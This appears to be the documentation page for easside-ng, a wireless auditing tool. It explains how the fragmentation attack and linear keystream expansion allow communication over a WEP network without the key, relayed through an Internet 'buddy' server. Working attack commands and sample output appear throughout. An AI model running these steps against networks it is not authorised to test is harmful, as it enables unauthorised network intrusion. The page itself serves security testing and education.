Easside-ng is an auto-magic tool which allows you to communicate via an WEP-encrypted access point (AP) without knowing the WEP key. It first identifies a network, then proceeds to associate with it, obtain PRGA (pseudo random generation algorithm) xor data, determine the network IP scheme and then setup a TAP interface so that you can communicate with the AP without requiring the WEP key. All this is done without your intervention.
There are two primary papers “The Fragmentation Attack in Practice” by Andrea Bittau and “The Final Nail in WEP's Coffin” by Andrea Bittau, Mark Handley and Josua Lockey which are of interest. See the the links page for these papers and more. The papers referenced provide excellent background information if you would like to understand the underlying methodologies. The concepts for the fragment attack currently incorporated in aircrack-ng came from these papers.
In order to access the wireless network without knowing the WEP key, we have the AP itself decrypt the packets. This is achieved by having a “buddy” process running on a server accessible on the Internet. The “buddy” server echoes back the decrypted packets to the system running easside-ng. This imposes a number of critical requirements for easside-ng to work:
There are two overall phases:
Each phase will be described in more detail in the following sections.
Here are the steps which essside-ng performs during the establishing connectivity phase:
At this point, you run “ifconfig at0 up” and you are now able to communicate with any host on the wifi network via this TAP interface. Notice that you don't need a WEP key to do this! The TAP interface is a virtual interface that acts as if it were the wifi interface with the correct WEP key configured. You can assign an IP, use DHCP with it and so on.
The following is a simplistic description. A very detailed description of the steps to decrypt packets is included in later sections.
The following describes this diagram in more detail.
So you may be asking “What is the magic? How can you access the WIFI network without knowing the WEP key?”. The method is quite simple yet ingenious.
Lets look at the details of sending and receiving packets via the at0 TAP interface.
This section provides a brief explanation of the fragmentation technique used in easside-ng.
This technique, when successful, can obtain 1504 bytes of PRGA (pseudo random generation algorithm). This attack does not recover the WEP key itself, but merely obtains the PRGA. The PRGA can then be used to encrypt packets you want to transmit. It requires at least one data packet to be received from the access point in order to initiate the attack.
Basically, the program obtains a small amount of keying material from the packet then attempts to send packets with known content to the access point (AP). If the packet is successfully echoed back by the AP then a larger amount of keying information can be obtained from the returned packet. This cycle is repeated several times until 1504 bytes of PRGA are obtained.
The original paper, The Fragmentation Attack in Practice, by Andrea Bittau provides a much more detailed technical description of the technique. A local copy is located here. A local copy of the presentation slides is located here. Also see the paper “The Final Nail in WEP's Coffin” on this page.
This section provides a brief explanation of the linear keystream expansion technique used in easside-ng.
So you may also be asking “What is the linear keystream expansion technique?”. The foundation is the fact that packets like an encrypted ARP request can easily be identified combined with the fact that the start of it has known plain text.
The program first obtains the PRGA from known plain text portion of the ARP request. Then it creates a new ARP request packet broken into two fragments. The first fragment is one more byte than the known PRGA and the PRGA is guessed for the extra byte. These guesses are sent and the program listens to see which one is replayed by the AP. The replayed packet has the correct PRGA and this value was included in the destination multicast address. Now that we know the correct PRGA, one more byte can be decrypted in the original ARP request. This process is repeated until the sending IP in the original ARP request is decrypted. It takes a maximum of 256 guesses to determine the correct PRGA for a particular byte and on average only 128 guesses.
The linear keystream expansion technique (Arbaugh inductive) is reverse chopchop. Chopchop decrypts packets from back to the front. Linear decrypts packets from the front to the back. Actually, chopchop is reverse Arbaugh.
The companion aircrack-ng suite program to easside-ng is wesside-ng. Here is a brief comparison of the two tools:
|Stability of the program||Stable||Proof of concept|
|Finds a MAC address to spoof||No||Yes|
|Fake Authentication to AP||Yes||Yes|
|Can use ARP packets for fragmentation||Yes||Yes|
|Can use IP packets for fragmentation||Yes||No|
|Fragmentation attack to obtain PRGA||Yes||Yes|
|Linear Keystream Expansion Technique||Yes||Yes|
|Communication with wifi network without WEP key||Yes||No|
|Network ARP request flooding||No||Yes|
|Aircrack-ng PTW attack||No||Yes|
|Recovers WEP key||No||Yes|
Why release easside-ng when aircrack-ng has PTW?
Usage: easside-ng <args>
NOTE: There are no parameters for buddy-ng. Once invoked, it listens on TCP port 6969 and UDP port 6969. TCP is used for the permanent connection between esside-ng and buddy-ng. UDP is used to receive decrypted packets from the AP.
When you run easside-ng, it creates a file automatically in the current directory:
It is very important to delete this file prior to starting the program when you change target access point.
Be sure to use airmon-ng to put your card into monitor mode.
First, you need to start a buddy server. This needs to be located on the Internet and be accessible from the system running easside-ng via TCP. It must also be accessible from the AP via UDP. Port 6969 cannot be firewalled on it.
You start the buddy sever:
buddy-ng Waiting for connexion
When easside-ng connects, it responds similar to:
Got connection from 10.113.65.187 Handshake complete Inet check by 10.113.65.187 1
The IP 10.113.65.187 above is the IP of the system running easside-ng.
Now run easside-ng:
easside-ng -f ath0 -v 00:14:6C:7E:40:80 -c 9 -s 10.116.23.144
The system responds:
Setting tap MTU Sorting out wifi MAC MAC is 00:08:D4:86:7E:98 Setting tap MAC [14:40:06.596419] Ownin...
SSID teddy Chan 9 Mac 00:14:6C:7E:40:80 Sending auth request Authenticated Sending assoc request Associated: 1 Assuming ARP 54 [14:40:13.537842] Got 22 bytes of PRGA IV [4B:02:00] [14:40:13.545021] Got 58 bytes of PRGA IV [4C:02:00] [14:40:13.648670] Got 166 bytes of PRGA IV [4D:02:00] [14:40:13.753087] Got 490 bytes of PRGA IV [4E:02:00] [14:40:13.863819] Got 1462 bytes of PRGA IV [4F:02:00] [14:40:13.966753] Got 1504 bytes of PRGA IV [50:02:00] Assuming ARP 36 [15:23:42.047332] Guessing prga byte 22 with 16 ARP IP so far: 192 [15:23:42.749330] Guessing prga byte 23 with 3F ARP IP so far: 192.168 [15:23:43.815329] Guessing prga byte 24 with 60 ARP IP so far: 192.168.1 My IP 192.168.1.123 Rtr IP 192.168.1.1 Sending who has 192.168.1.1 tell 192.168.1.123 Rtr MAC 00:14:6C:7E:40:80 Trying to connect to buddy: 10.116.23.144:6969 Connected Handshake compl33t Checking for internet... 1 Internet w0rx. Public IP 10.113.65.187 Rtt 77ms
At this point, you need to bring up the TAP interface:
ifconfig at0 up
Now you can send and receive packets to and from the AP network which in this case is 192.168.1.0/24 via the at0 interface. Notice that you don't need a WEP key to do this! The TAP interface is a virtual interface that acts as if it were the wifi interface with the correct WEP key configured. You can assign an IP, use DHCP with it and so on. By default, the at0 interface is assigned the network obtained at the start plus ”.123”.
The “Specific AP Usage Example” is for targeting a single Access Point on a specific channel. You can also let easside-ng scan for APs by using “easside-ng -f ath0 -s 10.116.23.144”.
As you may know, wesside-ng is a proof-of-concept tool which is rich in functionality, but is not as stable and bug-free compared to easside-ng. You can combine the strengths of wesside-ng and easside-ng together.
First run easside-ng to obtain the prga file. Then run wesside-ng to flood the network and obtain the WEP key. It is really that simple!
Playfully, this is known as Besside-ng.
IMPORTANT: You must have written permission from the owner of the AP prior to using the instructions in this section. It is illegal to access networks which do not belong to you.
A clever way to demonstrate the insecurity of WEP networks and access points:
This section will discuss what works and what does not work with regards to testing easside-ng against your own wireless LAN.
6969 is the standard port used by easside-ng and buddy-ng. If you change it, then of course, use the revised port number in all references below.
First, some simple assumptions about your wireless LAN:
Assumptions about your buddy-ng server:
Assumptions about the system running easside-ng;
The easiest way to test connectivity to the buddy-ng server is by using telnet. Be sure to start your buddy server process prior to doing this test! Otherwise it will fail for sure.
telnet <ip of buddy server> 6969
The system should respond:
Trying <ip of buddy server>... Connected to <ip of buddy server>. Escape character is '^]'.
The buddy server should look like this:
Waiting for connexion Got connection from <ip of the easside-ng system>
When you terminate the telnet session, it should look like this:
That was it Waiting for connexion
The above examples show a successful test. If your test fails then use tcpdump or wireshark on the source and destination systems to sniff port 6969. Determine the problem with these tools and others then correct the root problem.
If you are running easside-ng and buddy-ng on the same system then the system must have a routeable Internet IP address. You cannot be on a LAN behind a firewall which does network address translation (NAT).
The ideal situation is to have the buddy-ng server running on a separate system someplace on the Internet. Then have a second system with easside-ng running with a routeable IP address.
To obtain a tap interface in a MS Windows environment, install OpenVPN.